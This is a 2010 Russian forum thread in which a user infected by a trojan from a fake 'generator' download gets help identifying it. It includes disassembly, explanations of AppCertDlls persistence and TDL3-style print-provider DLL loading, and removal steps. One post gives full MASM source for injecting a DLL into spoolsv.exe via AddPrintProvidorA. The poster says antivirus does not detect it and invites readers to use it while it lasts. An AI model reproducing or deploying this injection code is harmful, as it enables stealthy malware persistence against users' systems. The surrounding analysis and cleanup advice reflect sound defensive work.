Помогите определить что это за троянская программа
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите определить что это за троянская программа - 2010-11-12 00:43:46.456666
|
|
|
Alexggf
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-12 00:37:53.496666
|
Всем привет, дня 2 назад повелся на развод, и скачал прогу http://narod.ru/disk/27164186000/generator.rar
Д.Веб, и мой Эзет молчал, я и скачал, понял что это какая то лажа и удалил.
Так вот, сейчас узнал что те кто качал этот файл, то у тех стиснули пароли и данные.
Щас, обновил Эзет, решил проверить с народа файл, и опа троян!!!!
Кто может определить, что за троян, и какие данные мог угнать, и что делать?
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 01:17:06.050000
|
|
|
Alexggf
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-12 00:37:53.496666
|
Ну, что кто нить может приблизительно сказать что это?
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 01:49:21.273333
|
|
|
якот
Сообщений: 4
Оценки: 0
Присоединился: 2010-08-29 19:42:48.410000
|
ищи в инете по базам вирей..см что за трой выдает антивирь и шукай что он крадет)
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 02:11:23.290000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Что-то новенькое, как я понял он тащит пароли от яндекса и отправляет их на мыло.
Вначале создает временную dll (temp82888238.dll), и инжектит ее в процесс spoolsv.exe:
00401119 | MOV DWORD PTR SS:[EBP-24],403227 ; ASCII "name1738328"
00401120 | MOV DWORD PTR SS:[EBP-1C],40310D ; ASCII "C:\DOCUME~1\FLINT_~1\LOCALS~1\Temp\temp82888238.dll"
00401127 | MOV DWORD PTR SS:[EBP-20],0
0040112E | LEA EAX,DWORD PTR SS:[EBP-24]
00401131 | PUSH EAX
00401132 | PUSH 1
00401134 | PUSH 0
00401136 | CALL 004011F4; <JMP.&winspool.AddPrintProvidorA>
Использование этой функции, я в вирусах встречаю впервые, хотя возможно она и не новая.
Далее если эта dll загружается в процесс, то она перемещает себя в udlmain.dll
В автозапуск записывается так, что тоже я встречаю в дикой природе впервые:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"AppSecDll"="udlmain.dll"
Цитирую:
Блокировка в режиме пользователя
Да, и такой механизм существует, он вполне легален, хоть и не документирован, а его поддержка впервые появилась в Windows 2000. Для реализации этого способа потребуется написать DLL, содержащую, как минимум, один экспорт, и прописать эту DLL в определённом параметре системного реестра. Самое интересное, что до сих пор не многие знают об этом способе, а ведь он как-никак позволяет внедрить свою DLL в автозапуск, при чём в привилегированные системные процессы типа Winlogon-а. Например, ребята из ЛК, похоже, не знают, или знают, но отчего-то не используют это в своих продуктах. Autoruns тоже не показывает этот ключ, и складывается впечатление, что Microsoft упорно пытается скрыть эту информацию. Может быть я не прав, не знаю. [u]Обновление[/u]: в новых версиях продуктов ЛК этот ключ уже контролируется. Долго же ребята соображали.
Имя и прототип экспортируемой функции:
NTSTATUS
CreateProcessNotify (
LPCWSTR lpApplicationName,
ULONG uReason);
Соглашение о вызове stdcall. В первом параметре получим полный путь к исполняемому файлу-образу запускаемого приложения, а uReason может быть одно из следующего:
#define APPCERT_IMAGE_OK_TO_RUN 0x00000001
#define APPCERT_CREATION_ALLOWED 0x00000002
#define APPCERT_CREATION_DENIED 0x00000003
В Windows 2000 колбек-функция вызывается всегда два раза. Первый раз вызывается со значением APPCERT_IMAGE_OK_TO_RUN, что означает голосование, при чём один голос "против" перевешивает все остальные "за", т.е. вы можете вернуть любой ошибочный статус и процесс гарантировано создан не будет, ну или STATUS_SUCCESS если вам это безразлично. Второй раз колбек вызывается для уведомления о результатах голосования и тогда значение второго параметра будет либо APPCERT_CREATION_ALLOWED либо APPCERT_CREATION_DENIED. Начиная с Windows XP вроде бы логика чуть-чуть поменялась и колбек вызывается только один раз, но тут я не поручусь, проверять надо, оставим это вам на домашнее задание.
Ключ: HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls
Тип значения: REG_EXPAND_SZ
Теперь пару слов о том, как регистрировать вашу DLL и кто её вызывает. Вы прописываете путь к вашей DLL в указаном чуть выше ключе системного реестра. Имя параметра можете использовать любое, но желательно не трогать параметр по-умолчанию, а также зарезервированные системные имена типа AppSecDll, чуть более подробно об этом по ссылке [link=http://go.blog.ru/?http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q320181]здесь[/link].
Инициализация этого списка начинается после запуска процесса Winlogon-а, потому что Winlogon это первое Win32-приложение, которое запускается нативным менеджером сеансов (smss.exe). Непосредственно чтение параметров реестра, загрузка указанных там модулей и вызов колбек-функций выполняется внутри функции [link=http://go.blog.ru/?http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx]CreateProcess[/link] и только один раз в течении всей жизни процесса. Другими словам, после регистрации ваш модуль будет подгружен только в новые процессы, но не в уже существующие.
Как вы уже, наверное, догадались, любое приложение, которое хочет обойти эту блокировку, может сделать это без каких-либо проблем. Для этого ему достаточно пропатчить код функции CreateProcessInternalW или BasepIsProcessAllowed в памяти собственного процесса. Найти код можно, к примеру, используя несложный паттерн. Добавить здесь особо нечего, посмотрим теперь, что мы можем сделать в режиме ядра.
Т.о. удали temp82888238.dll и udlmain.dll, а также очисти автозапуск
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 10:05:49.750000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
00401119 | MOV DWORD PTR SS:[EBP-24],403227 ; ASCII "name1738328"
00401120 | MOV DWORD PTR SS:[EBP-1C],40310D ; ASCII "C:\DOCUME~1\FLINT_~1\LOCALS~1\Temp\temp82888238.dll"
00401127 | MOV DWORD PTR SS:[EBP-20],0
0040112E | LEA EAX,DWORD PTR SS:[EBP-24]
00401131 | PUSH EAX
00401132 | PUSH 1
00401134 | PUSH 0
00401136 | CALL 004011F4; <JMP.&winspool.AddPrintProvidorA>
Это позволяет загрузить dll в процесс spoolsv.exe, впервые это было применено в нашумевшем TDL3 (TDSS)
Использование AddPrintProcessor и AddPrintProvidor API функций
Отличительной особенностью руткитов данного семейства является способ загрузки драйвера: с помощью службы печати. Процесс установки руткита можно разделить на две стадии:
• Регистрация вспомогательной библиотеки службы печати;
• Загрузка драйвера режима ядра.
Для того чтобы зарегистрировать вспомогательную библиотеку службы печати необходимо обладать привилегией SE_LOAD_DRIVER_PRIVILEGE, позволяющей загружать/выгружать драйверы. Чтобы получить данную привилегию, дропер вызывает функцию RtlAdjustPrivilge. Если вызов данной функции осуществлён успешно, дропер копирует себя в %PrintProcessor% каталог в виде динамической библиотеки и осуществляет вызов функции AddPrintProcessor (AddPrintProvidor), передавая ей в качестве параметра имя скопированной библиотеки и строку “tdl”. Данный вызов посредством RPC механизма заставляет службу печати загрузить указанную библиотеку и вызвать её точку входа
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 12:10:22.400000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Переписал код инжекта в spoolsv.exe, проактивка вроде бы не палит. Так что можно юзать пока не прикрыли ;)
.586
.model flat, stdcall
option casemap :none
include \MASM32\INCLUDE\kernel32.inc
include \MASM32\INCLUDE\user32.inc
include \MASM32\INCLUDE\winspool.inc
include \MASM32\INCLUDE\windows.inc
includelib \MASM32\LIB\kernel32.lib
includelib \MASM32\LIB\user32.lib
includelib \MASM32\LIB\winspool.lib
assume fs: nothing
.data
file db "\inject.dll", 0
myname db "My_Inject", 0
.data?
CurrDir db MAX_PATH dup (?)
buff db 4 * 3 dup (?)
.code
start:
push offset CurrDir
push MAX_PATH
CAll GetCurrentDirectoryA
push offset file
push offset CurrDir
Call lstrcatA
PUSH 0
PUSH 80h
PUSH OPEN_EXISTING
PUSH 0
PUSH 0
PUSH GENERIC_READ
PUSH offset CurrDir
CALL CreateFileA
cmp eax, -1
jz exit
push eax
Call CloseHandle
mov dword ptr ds:[buff], offset myname
mov dword ptr ds:[buff + 4], 0
mov dword ptr ds:[buff + 8], offset CurrDir
push offset buff
push 1
push 0
Call AddPrintProvidorA
exit:
push 0
Call ExitProcess
end start
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 12:46:25.850000
|
|
|
Alexggf
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-12 00:37:53.496666
|
Flint_ta, а как удалить эти файлы? тоесть по поиску я их не нахожу. А где они хранятся?
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 12:49:49.856666
|
|
|
CkopnuoH.zkn
Сообщений: 354
Оценки: 0
Присоединился: 2010-02-03 11:06:33.976666
|
В реестре путь до них указан, почисти реестр, там истина :)
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 14:06:44.810000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Тыкни правой на AppSecDll, выбери удалить. Затем перезагрузись с кнопки и проверь реестр заново.
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 14:21:34.656666
|
|
|
Alexggf
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-12 00:37:53.496666
|
Сделал, при поиске udlmain пишет Finished searching through the registry.
Тоесть это все? В поиске temp82888238 ничего удалять не надо?
И еще как я понял троян ворует только пароли от яндекса, тоесть, пароли от форумов, сайтов он не ворует и файлы с компа он украсть не мог? И какя вероятность того что пароли уже у того человека?
Всем спасибо за помощь!
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 15:00:40.360000
|
|
|
Alexggf
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-12 00:37:53.496666
|
Спасибо, тоесть mail и яндекс, если можно то последний вопрос, внизу написаны браузеры, а оперы там нет, тоесть с оперы он не воровал, я так понимаю или я чего то не понимаю…?
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 15:27:29.280000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
mail.ru для отправки почты там используется, dll внедряется во все процессы, но интересуют ее только три.
|
|
|
|
|
RE: Помогите определить что это за троянская программа - 2010-11-12 15:35:33.176666
|
|
|
Alexggf
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-12 00:37:53.496666
|
Flint_ta, ясно, спасибо огромное! Извините, что я вас напрегаю!
Значит, тогда мне больше ничего удалять не надо, ( из авотозапуска и реестра) и желательно на важных почтовых ящиках яндекса сменить пароль?(впринцепи уже сменил), хотя остались типа однодневок, для рег для спама на форумах, но мне они и не нужны)))
Еще раз спасибо за помощь!)
|
|
|
|
|
|
